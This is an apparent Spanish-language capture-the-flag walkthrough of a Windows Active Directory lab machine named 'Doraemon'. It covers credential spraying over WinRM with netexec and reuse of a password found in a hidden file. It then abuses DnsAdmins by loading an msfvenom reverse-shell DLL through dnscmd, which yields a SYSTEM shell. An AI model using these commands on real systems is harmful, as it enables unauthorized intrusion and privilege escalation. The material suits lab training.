Doraemon

Hacemos el escaneo inicial:

   8   │ 445/tcp   open  microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds (workgroup: DORAEMON)
   9   │ 464/tcp   open  kpasswd5?
  10   │ 593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
  11   │ 636/tcp   open  tcpwrapped
  12   │ 3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: DORAEMON.THL, Site: Default-First-Site-Name)
  13   │ 3269/tcp  open  tcpwrapped
  14   │ 5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  15   │ |_http-server-header: Microsoft-HTTPAPI/2.0
  16   │ |_http-title: Not Found
  17   │ 9389/tcp  open  mc-nmf       .NET Message Framing
  18   │ 47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  19   │ |_http-server-header: Microsoft-HTTPAPI/2.0
  20   │ |_http-title: Not Found
  21   │ 49664/tcp open  msrpc        Microsoft Windows RPC
  22   │ 49665/tcp open  msrpc        Microsoft Windows RPC
  23   │ 49666/tcp open  msrpc        Microsoft Windows RPC
  24   │ 49667/tcp open  msrpc        Microsoft Windows RPC
  25   │ 49669/tcp open  msrpc        Microsoft Windows RPC
  26   │ 49670/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
  27   │ 49671/tcp open  msrpc        Microsoft Windows RPC
  28   │ 49672/tcp open  msrpc        Microsoft Windows RPC
  29   │ 49675/tcp open  msrpc        Microsoft Windows RPC
  30   │ 49738/tcp open  msrpc        Microsoft Windows RPC
  31   │ MAC Address: 00:0C:29:2E:CE:E8 (VMware)
  32   │ Service Info: Host: WIN-VRU3GG3DPLJ; OS: Windows; CPE: cpe:/o:microsoft:windows
  33   │ 
  34   │ Host script results:
  35   │ |_clock-skew: mean: -7h20m01s, deviation: 34m38s, median: -7h00m01s
  36   │ | smb2-security-mode: 
  37   │ |   3:1:1: 
  38   │ |_    Message signing enabled and required
  39   │ |_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:2e:ce:e8 (VMware)
  40   │ | smb-security-mode: 
  41   │ |   account_used: guest
  42   │ |   authentication_level: user
  43   │ |   challenge_response: supported
  44   │ |_  message_signing: required
  45   │ | smb2-time: 
  46   │ |   date: 2025-02-17T12:49:21
  47   │ |_  start_date: 2025-02-17T12:43:48
  48   │ | smb-os-discovery: 
  49   │ |   OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
  50   │ |   Computer name: WIN-VRU3GG3DPLJ
  51   │ |   NetBIOS computer name: WIN-VRU3GG3DPLJ\x00
  52   │ |   Domain name: DORAEMON.THL
  53   │ |   Forest name: DORAEMON.THL
  54   │ |   FQDN: WIN-VRU3GG3DPLJ.DORAEMON.THL

Miramos los archivos compartidos como en la mayoría y encontramos:

gorrocoptero

Al entrar a esa carpeta encontramos un archivos la cual la descargamos:

Ahora copiamos todos los posibles usuarios a un archivo;

El puerto 5985 es el puerto predeterminado que utiliza WinRM para comunicarse con un equipo remoto en Windows. WinRM es un servicio que permite la administración remota de Windows.

  • (El puerto HTTP predeterminado es el TCP 5985, y el puerto HTTPS predeterminado es el TCP 5986.)

  14   │ 5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  15   │ |_http-server-header: Microsoft-HTTPAPI/2.0
  16   │ |_http-title: Not Found

Ahora con la lista de usuarios miramos si esos mismos usuarios pueden ser la contraseña de otros:

netexec winrm 192.168.1.44 -u users.txt -p users.txt

Y se encontro una credencial:

WINRM       192.168.1.44   WIN-VRU3GG3DPLJ  [+] DORAEMON.THL\Doraemon:Dorayaki1 (Pwn3d!)

Entramos:

Intentemos hacer uns busqueda recursiva por txt en el ususario
Get-ChildItem -Path C:\Users -Recurse -Force -Include *.txt 2>$null

Esto nos arroja:

Entramos al directorio pero como esta oculto usamos -force:


*Evil-WinRM* PS C:\Users\Doraemon\Links> type 'Carta de amor a Shizuka.txt'
Shizuka te doy la clave de mi corazon: ShizukaTeAmobb12345
*Evil-WinRM* PS C:\Users\Doraemon\Links>

AHORA de igual manera agregamos esa contraseña al archivo para probar de quien es la contraseña:

netexec winrm 192.168.1.44 -u users.txt -p users.txt --continue-on-success

--continue-on-success:

  • Esta opción le indica a netexec que continúe probando otras credenciales incluso después de encontrar una combinación exitosa. Esto es útil si quieres enumerar todas las credenciales válidas.

Se ecnontro lo siguiente:

WINRM       192.168.1.44 [+] DORAEMON.THL\Suneo:ShizukaTeAmobb12345 (Pwn3d!)

Ahora entramos como Suneo:

#HACEMOS EL AUMENTO DE PRIVILEGIOS

  • net user Suneo

Pertenece al grupo DnsAdmins

INFO:

LogoDnsAdminPentest Everything

Bien para esto primero creamos un ardchivo malicioso con msfvenom (dll):

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.50 LPORT=1988 -f dll -o rs.dll

Con:

❯ impacket-smbserver  lasmar ./

Este comando crea un servidor SMB que:

  1. Comparte el directorio actual (./) en la red.

  2. Expone el recurso compartido con el nombre lasmar .

  3. Permite que otros dispositivos en la red se conecten a este recurso compartido y accedan a los archivos dentro del directorio

BIEN!!

Ahora ejecuatemos el comando en la maquina victima:

dnscmd.exe /config /serverlevelplugindll \\192.168.1.50\lasmar\rs.dll

Y nos tiene que salir:

Ahora en escucha:

nc -nlvp 1988

En la maquina victima ejecutamos el siguiente comando:

sc.exe stop dns
sc.exe start dns

Y tendremos la reverse shell... nt authority\system

PreviousWINDOWSNextChimichurri

Last updated